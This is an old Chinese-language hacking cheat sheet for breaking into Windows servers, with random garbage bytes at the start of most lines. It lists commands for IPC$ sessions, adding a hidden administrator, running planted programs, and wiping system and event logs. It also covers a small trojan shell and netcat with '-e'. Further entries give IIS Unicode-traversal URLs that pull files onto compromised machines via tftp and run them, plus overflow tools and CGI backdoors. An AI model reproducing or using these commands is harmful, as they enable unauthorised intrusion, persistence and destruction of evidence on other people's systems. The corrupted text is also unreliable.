网管和黑客都必须知道的命令
\T��/~"�
w 常用的几条NET命令:
��U*(�m'Ea �;B:'8�$j$ (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
1YTnOiYS�1 KNi�c$:�i� (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
�5Q?�7 xTQ ��CD +,&id (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
-��9UQs.Nv CGbW]�D$@� (查看远程主机时间) net time \\IP地址
Y@���Lv>p� �<ij;^ygYD (定时启动某个程序) at \\IP地址 02:18 readme.exe
"c�\ZUx_i6 Q�ukL�sl]U (查看共享) net view \\IP地址
� ��=SR�p� �Q�6�`oo/ (查看netbios工作组列表) nbtstat -A IP地址
>dUnk�)7� v��h�"zYl` (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
Gm}�ec�W� �!}9k
@=[ (这两条把自己增加到管理员组): net user 用户名 密码 /add
JcvW�E�
�$ `jSxq66L p net localgroup Administrators 用户名 /add
]�>b.oI��/ JY(_�}A�Au (断开连接) net use \\IP地址\ipc$ /delete
Z�oh2m`�6� nB�gks�B*A 扫尾:
^�.&�2-#i w�-Y-�;*�S del C:\winnt\system32\logfiles\*.*
/VgA�}[�%y �Xjt/ G):L del C:\winnt\ssytem32\config\*.evt
w�6F4o;<PR *T�$`�5|� del C:\winnt\system32\dtclog\*.*
6#MI���t:# ;[R�{oW
Nw del C:\winnt\system32\*.log
n-�be8p�)- u}W �R1u�[ del C:\winnt\system32\*.txt
nbj��&�3z, Q��mT L�-� del C:\winnt\*.txt
?\L@Pr|=Dr G'^�Qi}o�� del C:\winnt\*.log
��+�?5nkhH 6Z]�* ce<r 一、netsvc.exe
�U;<07
aMj Smzy E�MT� 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
�t�7pe)i,) �y/�Fv4�<X netsvc /list \\IP地址
�� )�`!i" ~e�~iCyW;S netsvc schedule \\IP地址 /query
hF"yxu�cj$ tY-{uH�W&h netsvc \\IP地址 schedule /start
�]R~K-cN`� �Q&}�`( ]k 二、OpenTelnet.exe
��)mT{w9�u �]�mY�T!(} 远程启动主机的Telnet服务,并绑定端口到7878,例如:
�y�#�!�8S{ <t�>"b|fW OpenTelnet \\IP地址 用户名 密码 1 7878
;HtHN�
K(o n d�gG1v�% 然后就可以telnet到主机的7878端口,进入DOS方式下:
"q5Tw+KCfu #]�>Z4=�]v telnet IP地址 7878
� i1v�0J-> )EZ#BF<0�| 三、winshell.exe
'gHa�3:US JE9SPFQx9M 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
-$WU�-7�`� Lg�w�!S�~0 p Path (查看winshell主程序的路径信息)
�)F
Q
'�^� P�b�4%"�9` b reBoot (重新启动机器)
Sz�|�;wsF{ t�h]��1>
. d shutDown (关闭机器)
?s��/�]k#H ��T�~@$WM( s Shell (执行后你就会看到可爱的“C:\>”)
wiKU��s0�| Mw�M�v[];I x eXit (退出本次登录会话,此命令并不终止winshell的运行)
:L�u=t�3#
=� �s^�KZV CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
qO�AK`��{b �Loo�48��� 四、3389登陆器,GUI方式登录远程主机的
�oKjQ?�
4� 7<;87�t]] 五、elsave.exe
zXWf($^&�E 3��m:[�o`L 事件日志清除工具
�%s<7�M@]f -8H0�f-��1 elsave -s \\IP地址 -l "application" -C
�]w� �^9qS ����,U':=8 elsave -s \\IP地址 -l "system" -C
Y~@@{��z�P �faH�113nc elsave -s \\IP地址 -l "security" -C
Qz6�Ry\u�� � �d(��!�W 执行后成功清除应用程序日志,系统日志,安全日志
i�v@�ey-,< !�@j5�yYf� 六、hbulot.exe
&cy�@Be}|T +
q@kRQY;n 开启win2kserver和winxp的3389服务
M{\W$xPL)� �)r��X�["= hbulot [/r]
4E\Jk�5co, �AY3�nQH
� 使用/r表示安装完成后自动重起目标使设置生效。
(prq�o1e@� �\�H
�<k� 七、nc.exe(netcat.exe)
U����8Rko) �ZmM/�YPy 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
�~��m4{GzB 6X��U�1w�� 想要连接到某处: nc [-options] hostname port[s] [ports] ...
�UOh��%�"h %C}TdG��(C 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
�8&����T6� Tp7*�T���8 参数:
?&v+-4%4PI w�#ha ^��4 -e prog 程序重定向,一旦连接,就执行 [危险!!]
:f1Q0klwP� i4�"BN,NZ{ -g gateway source-routing hop point[s], up to 8
,D#ssx���V ="X2AuK%1$ -G num source-routing pointer: 4, 8, 12, ...
�c�a�~n�fo �w'u�I~t4 -h 帮助信息
ks�{y=@�<, �~{�-��zj� -i secs 延时的间隔
�}��@VdtH e�a��n�_/E -l 监听模式,用于入站连接
+v$,/~$tI� _�;� 7�{1n -n 指定数字的IP地址,不能用hostname
oUXi�4lsSc lN�@SfM4�\ -o file 记录16进制的传输
b=Rw=�K.�
�+�OGa}9j- -p port 本地端口号
�j2\B��(PA h?UUd\RU�) -r 任意指定本地及远程端口
HP`dfo�~j PWU8 9YX�p -s addr 本地源地址
8HL$y�-F� <�K6��:��" -u UDP模式
�Id_���?�� h%2�;B;�p] -v 详细输出——用两个-v可得到更详细的内容
bU3�e�*�Er |ATz<"q��> -w secs timeout的时间
�AHg:`Wjv- 5G�$sP,��n -z 将输入输出关掉——用于扫描时
Ab|
t��E5% 八、TFTPD32.EXE
f8Z[p�rfP 5X8���GR5P 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
��>j&�+mii dS+�/G9X�^ http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
�H83Gx;�� P~"e=N��L5 然后可以直接令文件运行:
k)�'y;{IN� 6�p;G~,bd~ http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
CJ�n{�tP�� �$ NNd4�d* 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
�(Nzup�3j� ��+0{$J\�s 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
|$�hB�Y��w Q~p)��@[q� 一、一 Xscan命令行运行参数说明:
QL_vWG���- A>C&`�A=-� 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
?p&�C��R�[ �U-����b�( 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
nU^�-D1s{ �4Z'/d�I`� xscan -file <主机列表文件名> <检测项目> [其他选项]
nTG�@=�C�# >
T$M0&<�� 其中<检测项目> 含义如下:
8ClOd��<I H<Ne\�zAv� -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
QQ�*`�tmy E.ugr��])� -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
?�%QWpKO7X Z}b����25) -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
D90.z"N\i9 t>�~a/K"� -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
zC�p��sGr� w)�nFH)f� -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
n�BN+.RB:( u�!]�g��^r [其他选项] 含义如下:
�-l:4I6-hi ����jyL��E -v: 显示详细扫描进度
/�-{C,+cB� Ht�{Q=w/�9 -p: 跳过Ping不通的主机
B4l��*�]K% Q�+����i� -o: 跳过没有检测到开放端口的主机
4G��o$�OQ` �-za+Wa`vH -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
